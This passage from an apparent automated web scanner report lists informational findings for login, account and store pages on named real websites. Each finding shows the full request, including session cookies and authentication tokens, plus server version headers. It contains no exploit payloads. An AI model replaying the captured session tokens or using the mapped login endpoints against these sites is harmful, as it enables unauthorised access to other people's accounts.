Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:43:57 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=1A21DC8B98A96EC21459B14B79587A583EC2F9BC37D2E75B5317EF0E65FAFEF6730683DB17DCF2BE06F0B1B98854DE5A707FC465E78510565D9EB9DAE71D857891B9157BA899B658EA734F816E3CE32760B05F6B24F34F4DF7A20D01665DF7E18DCAAC70E57C6EDF44A0197593C73CA0FAE6C559214D35FC361C5715FE43DBF19C70EBD085C78E9E5F286FC92ED8B559596ABC60CEFF4372C361E9E899AF7753D44DE2EF1A434F6907AE0EEE63371718A38CBFF23D5698B65E6F218C4AEADA2868A458441D2D6450C6DDD153EDB3A2CE7A069305EEEB72793F81C52FB84EB011536FEF0B; expires=Tue, 26-Apr-2011 21:13:49 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=62C8AFF94277E664484BBE7EC8277401DE5ADF5C5AEAF45D558739ADCD8069717EDC476F9611DA2668E59CB60B963048A7292391B9104F44FFCFB680230472EE9A68B087279430B80A9137BCF51FCBBE8CAA2B5135B21DAB33E2FF00B71448413EC9C7D9166F621CB8C527C88854A6B0E4DFD5CD34D4666CDACDA3442EF9704AA677452920C07B5940C397045601366D36704513C6FE9B69419D140474085B16735382FEB803D48FC173BBAFD3334424BF0894189520BF2901A304307E3DC9E63E08D54BB0A62CFE50A8B440B11838DBAA606EC4F2C964E593D9C23819FB20FA690F28E5; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...

27.23. https://www.bcbst.com/accounttools/public/askUserId.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /accounttools/public/askUserId.do

Request

GET /accounttools/public/askUserId.do?usage=forgot HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: http://www.bcbst.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849572150:ss=1303849513702

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Apr 2011 20:38:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Server: WebSphere Application Server/6.1
Cache-Control: private
Content-Length: 25749

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


        <html>
<head>
<title>Account Management - BCBST.com</title>
<meta name="page title" content="A
...[SNIP]...

27.24. https://www.bcbst.com/brokers/dental/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /brokers/dental/

Request

GET /brokers/dental/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849582858:ss=1303849513702; ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:57:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 35860
Content-Type: text/html
Cache-Control: private
Content-Length: 35860


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Dental - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n" content="br
...[SNIP]...

27.25. https://www.bcbst.com/brokers/group/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /brokers/group/

Request

GET /brokers/group/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849582858:ss=1303849513702; ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 31428
Content-Type: text/html
Cache-Control: private
Content-Length: 31428


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Group Products - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n" con
...[SNIP]...

27.26. https://www.bcbst.com/brokers/individual/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /brokers/individual/

Request

GET /brokers/individual/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849582858:ss=1303849513702; ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:56:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 29094
Content-Type: text/html
Cache-Control: private
Content-Length: 29094


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Individual Products - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n
...[SNIP]...

27.27. https://www.bcbst.com/employers/dental/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /employers/dental/

Request

GET /employers/dental/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849582858:ss=1303849513702; ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:55:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 35347
Content-Type: text/html
Cache-Control: private
Content-Length: 35347


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Dental - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n" content="em
...[SNIP]...

27.28. https://www.bcbst.com/employers/vision/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /employers/vision/

Request

GET /employers/vision/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849582858:ss=1303849513702; ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:55:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 31441
Content-Type: text/html
Cache-Control: private
Content-Length: 31441


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Vision - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n" content="em
...[SNIP]...

27.29. https://www.bcbst.com/inc/loginform.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /inc/loginform.asp

Request

GET /inc/loginform.asp?t=0.3263980813790113 HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: https://www.bcbst.com/secure/public/login.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:26:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 837
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD; path=/
Cache-control: private
Content-Length: 837


<script>

</script>
<div>
<form name="mainlogon"
       method="post"
       action="/signon/processlogon.do">
   <div class="user">
       <label>User ID:</label>
       <input name="dnqualifier"
           type="text
...[SNIP]...

27.30. https://www.bcbst.com/members/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /members/

Request

GET /members/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849582858:ss=1303849513702; ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:52:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 37131
Content-Type: text/html
Cache-Control: private
Content-Length: 37131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Health Plan Members - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n
...[SNIP]...

27.31. https://www.bcbst.com/members/dental/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /members/dental/

Request

GET /members/dental/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849582858:ss=1303849513702; ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:53:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 33384
Content-Type: text/html
Cache-Control: private
Content-Length: 33384


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Dental - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n" content="me
...[SNIP]...

27.32. https://www.bcbst.com/members/vision/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /members/vision/

Request

GET /members/vision/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849582858:ss=1303849513702; ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:55:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 31098
Content-Type: text/html
Cache-Control: private
Content-Length: 31098


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Vision - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n" content="me
...[SNIP]...

27.33. https://www.bcbst.com/secure/public/InvalidAccess.shtm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /secure/public/InvalidAccess.shtm

Request

GET /secure/public/InvalidAccess.shtm HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849539512:ss=1303849513702; Calling_URL=https://www.bcbst.com:443/accounttools/

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:38:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 27482
Content-Type: text/html
Cache-Control: private
Content-Length: 27482


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Unauthorized Access - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta nam
...[SNIP]...

27.34. https://www.bcbst.com/secure/public/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /secure/public/login.asp

Request

GET /secure/public/login.asp HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: https://www.bcbst.com/secure/public/InvalidAccess.shtm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:41:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 29752
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSADSTDQ=JCKBMDCDBIIALLOMEMBMLDPK; path=/
Cache-control: private
Content-Length: 29752


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>BlueAccess - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n" content=""/>
<meta n
...[SNIP]...

27.35. https://www.freemanco.com/store/checkout/includes/stateRestriction.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freemanco.com
Path:   /store/checkout/includes/stateRestriction.jsp

Request

GET /store/checkout/includes/stateRestriction.jsp?countryCode=USA HTTP/1.1
Host: www.freemanco.com
Connection: keep-alive
Referer: https://www.freemanco.com/store/index.jsp?_requestid=131058
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/plain, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmc=95684043; __utmb=95684043.2.10.1303848339

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:51:41 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 10901


                                                           {
               
                   
                                                                                                                                                                               
...[SNIP]...

27.36. https://www.freemanco.com/store/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freemanco.com
Path:   /store/index.jsp

Request

GET /store/index.jsp?_requestid=131058 HTTP/1.1
Host: www.freemanco.com
Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/ourwork/creativeservices/creative.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmc=95684043; __utmb=95684043.2.10.1303848339

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:51:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 87252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <hea
...[SNIP]...

27.37. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Request

